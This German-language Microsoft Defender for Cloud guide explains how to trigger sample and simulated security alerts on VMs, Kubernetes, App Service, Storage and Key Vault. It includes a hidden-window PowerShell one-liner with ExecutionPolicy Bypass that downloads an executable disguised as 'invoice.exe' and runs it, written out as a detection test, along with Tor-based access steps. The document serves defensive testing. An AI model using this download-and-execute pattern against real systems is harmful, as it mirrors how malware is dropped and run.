Überprüfen von Warnungen in Microsoft Defender for Cloud

In diesem Artikel wird erläutert, wie Sie überprüfen, ob Ihr System für Microsoft Defender for Cloud Warnungen konfiguriert ist, damit Sie Bedrohungen überwachen und darauf reagieren können.

Was sind Sicherheitswarnungen?

Warnungen sind Benachrichtigungen, die Defender for Cloud generiert, wenn Bedrohungen für Ihre Ressourcen erkannt werden. Es priorisiert und listet die Warnungen zusammen mit den Informationen auf, die erforderlich sind, um das Problem schnell zu analysieren. Defender for Cloud stellt außerdem Empfehlungen zur Abwehr eines Angriffs bereit.

Weitere Informationen finden Sie unter Sicherheitswarnungen in Defender für Cloud und Verwalten von und Reagieren auf Sicherheitswarnungen.

Voraussetzungen

Damit Sie sämtliche Warnungen erhalten, müssen sich Ihre Computer und die verbundenen Log Analytics-Arbeitsbereiche im selben Mandanten befinden.

Generieren von Beispielsicherheitswarnungen

Wenn Sie die neuen Vorschaufunktionen für Warnungen verwenden, die unter Verwalten von und Reagieren auf Sicherheitswarnungen in Microsoft Defender for Cloud beschrieben werden, können Sie im Azure-Portal auf der Seite „Sicherheitswarnungen“ Beispielwarnungen erstellen.

Erstellen von Beispielwarnungen

Verwenden Sie Beispielwarnungen für Folgendes:

  • Bewerten Sie die Effizienz und Möglichkeiten Ihrer Microsoft Defender-Pläne.
  • Überprüfen Sie alle Konfigurationen, die Sie für Ihre Sicherheitswarnungen vorgenommen haben, z. B. SieM-Integrationen (Security Information and Event Management), Workflowautomatisierung und E-Mail-Benachrichtigungen.

So erstellen Sie Beispielwarnungen:

  1. Wählen Sie als Benutzer mit der Rolle Abonnementmitwirkender auf der Symbolleiste auf der Seite „Sicherheitswarnungen“ die Option Beispielwarnungen aus.
  2. Wählen Sie das Abonnement aus.
  3. Wählen Sie den entsprechenden Microsoft Defender-Plan (oder mehrere) aus, für den Sie Warnungen anzeigen möchten.
  4. Klicken Sie auf Beispielwarnungen erstellen.

Screenshot: Schritte zum Erstellen von Beispielwarnungen in Microsoft Defender für Cloud.

In einer Benachrichtigung werden Sie darüber informiert, dass die Beispielwarnungen erstellt werden:

Screenshot: Benachrichtigung, dass die Beispielwarnungen generiert werden.

Nach einigen Minuten werden die Warnungen auf der Seite mit Sicherheitswarnungen angezeigt. Sie werden auch an anderen Stellen angezeigt, die Sie für den Empfang von Microsoft Defender for Cloud-Sicherheitswarnungen konfiguriert haben (verbundene SIEM-Lösungen, E-Mail-Benachrichtigungen usw.).

Screenshot: Beispielwarnungen in der Liste der Sicherheitswarnungen.

Tipp

Die Warnungen gelten für simulierte Ressourcen.

Simulieren von Warnungen auf Ihren Azure virtuellen Computern (VMs) (Windows)

Bevor Sie beginnen, stellen Sie sicher, dass Microsoft Defender for Endpoint mit aktivierter Real-Time Schutz ausgeführt wird. Informationen zum Überprüfen dieser Einstellung finden Sie unter Configure Echtzeitschutz in Microsoft Defender Antivirus.

Nachdem der Microsoft Defender for Endpoint-Agent im Rahmen von Defender für die Serverintegration auf Ihrem Computer installiert wurde, führen Sie die folgenden Schritte auf dem Computer aus, auf dem Sie die angegriffene Ressource simulieren möchten.

Öffnen Sie eine Eingabeaufforderung mit erhöhten Rechten auf dem Gerät, und führen Sie das Skript aus:

  1. Navigieren Sie zu Start, und geben Sie cmd ein.

  2. Wählen Sie mit der rechten Maustaste Eingabeaufforderung und wählen Sie Als Administrator ausführen.

    Screenshot, der zeigt, wo „Als Administrator ausführen“ ausgewählt wird.

  3. Kopieren Sie an der Eingabeaufforderung den folgenden Befehl, und führen Sie ihn aus: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.

  4. Das Eingabeaufforderungsfenster wird automatisch geschlossen. Bei erfolgreicher Ausführung sollte in 10 Minuten eine neue Warnung auf dem Blatt Defender for Cloud-Warnungen angezeigt werden.

  5. Die Meldungszeile im PowerShell-Feld sollte in etwa wie hier dargestellt aussehen:

    Screenshot der PowerShell-Meldungszeile.

Alternativ können Sie die EICAR-Testzeichenfolge verwenden, um diesen Test durchzuführen. Erstellen Sie eine Textdatei, fügen Sie die EICAR-Zeile ein, und speichern Sie die Datei als ausführbare Datei auf dem lokalen Laufwerk Ihres Computers.

Simulieren von Warnungen auf Ihren Azure virtuellen Computern (VMs) (Linux)

Bevor Sie beginnen, stellen Sie sicher, dass Microsoft Defender for Endpoint mit aktivierter Real-Time Schutz ausgeführt wird. Informationen zum Überprüfen dieser Einstellung finden Sie unter Configure Echtzeitschutz in Microsoft Defender Antivirus.

Nachdem der Microsoft Defender for Endpoint-Agent auf Ihrem Computer installiert wurde, führen Sie im Rahmen der Integration von Defender for Servers die folgenden Schritte auf dem Computer aus, auf dem Sie die angegriffene Ressource der Warnung sein möchten:

  1. Öffnen Sie ein Terminalfenster, kopieren Sie den folgenden Befehl, und führen Sie ihn aus: curl -O https://secure.eicar.org/eicar.com.txt
  2. Das Eingabeaufforderungsfenster wird automatisch geschlossen. Bei erfolgreicher Ausführung sollte in 10 Minuten eine neue Warnung auf dem Blatt Defender for Cloud-Warnungen angezeigt werden.

Simulieren von Warnung in Kubernetes

Defender for Containers bietet Sicherheitswarnungen für Cluste und die zugrundeliegenden Clusterknoten. Defender für Container überwacht die Steuerungsebene (API-Server) und die containerisierte Workload.

Sie können Warnungen für die Steuerungsebene und den Workload simulieren, indem Sie das Kubernetes-Tool für Warnungssimulationen verwenden.

Weitere Informationen zum Schutz Ihrer Kubernetes-Knoten und -Cluster finden Sie unter Microsoft Defender for Containers.

Simulieren von Warnungen für App Service

Sie können Warnungen für Ressourcen simulieren, die in App Service ausgeführt werden.

  1. Erstellen Sie eine neue Website, und warten Sie 24 Stunden, bis diese bei Defender for Cloud registriert ist, oder verwenden Sie eine vorhandene Website.
  2. Nachdem die Website erstellt wurde, greifen Sie über die folgende URL darauf zu:

    1. Öffnen Sie den Bereich „App Service-Ressource“, und kopieren Sie die Domäne für die URL aus dem Feld „Standarddomäne“.

      Screenshot, der zeigt, wohin die Standarddomäne kopiert wird.

    2. Kopieren Sie den Websitenamen in die URL: https://<website-name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Eine Warnung wird innerhalb von ca. 2 bis 4 Stunden generiert.

Simulieren von Warnungen für Storage ATP (Erweiterter Schutz vor Bedrohungen)

Führen Sie die folgenden Schritte aus, um die Bedrohungserkennung für Microsoft Defender für den Speicher zu überprüfen:

  1. Navigieren Sie zu einem Speicherkonto, für das Azure Defender for Storage aktiviert ist.

  2. Wählen Sie in der Seitenleiste die Option Container aus.

    Screenshot: Navigation zur Auswahl eines Containers

  3. Navigieren Sie zu einem vorhandenen Container, oder erstellen Sie einen neuen.

  4. Laden Sie eine Datei in diesen Container hoch. Vermeiden Sie das Hochladen von Dateien, die unter Umständen vertrauliche Daten enthalten.

    Screenshot: Hochladen einer Datei in den Container

  5. Klicken Sie mit der rechten Maustaste auf die hochgeladene Datei, und wählen Sie die Option SAS generieren aus.

  6. Wählen Sie die Schaltfläche „Generiertes SAS-Token und URL“ aus (keine Änderung von Optionen erforderlich).

  7. Kopieren Sie die generierte SAS-URL.

  8. Öffnen Sie die Downloadseite des Tor-Browsers , und installieren Sie den Tor-Browser.

  9. Navigieren Sie im Tor-Browser zur SAS-URL. Die hochgeladene Datei sollte jetzt angezeigt werden und heruntergeladen werden können.

Testen von App Services-Warnungen

So simulieren Sie eine EICAR-Warnung für App Services:

  1. Suchen Sie den HTTP-Endpunkt der Website, indem Sie im Azure-Portal die Seite für die App Services-Website aufrufen oder den benutzerdefinierten DNS-Eintrag verwenden, der dieser Website zugeordnet ist. (Der Standard-URL-Endpunkt für die Azure-App Services-Website hat das Suffix https://XXXXXXX.azurewebsites.net). Die Website sollte eine vorhandene Website und nicht eine website sein, die vor der Warnungssimulation erstellt wurde.
  2. Suchen Sie den HTTP-Endpunkt der Website, indem Sie das Azure-Portalblatt für die App Services-Website aufrufen oder den benutzerdefinierten DNS-Eintrag verwenden, der dieser Website zugeordnet ist. (Der Standard-URL-Endpunkt für die Azure-App Services-Website hat das Suffix https://XXXXXXX.azurewebsites.net). Die Website sollte eine vorhandene Website und nicht eine website sein, die vor der Warnungssimulation erstellt wurde.
  3. Navigieren Sie zur Website-URL, und fügen Sie ihr das folgende feste Suffix hinzu: /This_Will_Generate_ASC_Alert. Die URL sollte wie folgt aussehen: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Es kann einige Zeit dauern, bis die Warnung generiert wird (~1,5 Stunden).

Überprüfen der Azure Key Vault-Bedrohungserkennung

Um Azure Key Vault Bedrohungserkennung zu überprüfen, führen Sie die voraussetzungen aus, und führen Sie dann die folgenden Schritte aus:

Voraussetzungen

Überprüfungsschritte

So überprüfen Sie Azure Key Vault Bedrohungserkennung:

  1. Nachdem Sie die Erstellung der Key Vault-Instanz und des Geheimnisses abgeschlossen haben, wechseln Sie zu einem VM mit Internetzugriff, und laden Sie den TOR-Browser herunter.
  2. Installieren Sie den TOR-Browser auf Ihrem VM.
  3. Nachdem Sie die Installation abgeschlossen haben, öffnen Sie Ihren regulären Browser, melden Sie sich beim Azure-Portal an, und greifen Sie auf die Key Vault-Seite zu. Wählen Sie die hervorgehobene URL aus, und kopieren Sie die Adresse.
  4. Öffnen Sie TOR, und fügen Sie diese URL ein (Sie müssen sich erneut authentifizieren, um auf das Azure-Portal zuzugreifen).
  5. Nachdem Sie den Zugriff abgeschlossen haben, können Sie auch die Option Geheimnisse im linken Bereich auswählen.
  6. Melden Sie sich im TOR-Browser vom Azure-Portal ab, und schließen Sie den Browser.
  7. Nach einiger Zeit löst Defender for Key Vault eine Warnung mit detaillierten Informationen zu dieser verdächtigen Aktivität aus.

Nächste Schritte

In diesem Artikel wurden Sie in den Prozess der Warnungsüberprüfung eingeführt. Nachdem Sie sich mit dieser Überprüfung vertraut gemacht haben, können Sie nun mit den folgenden Artikeln fortfahren:

  • Last updated on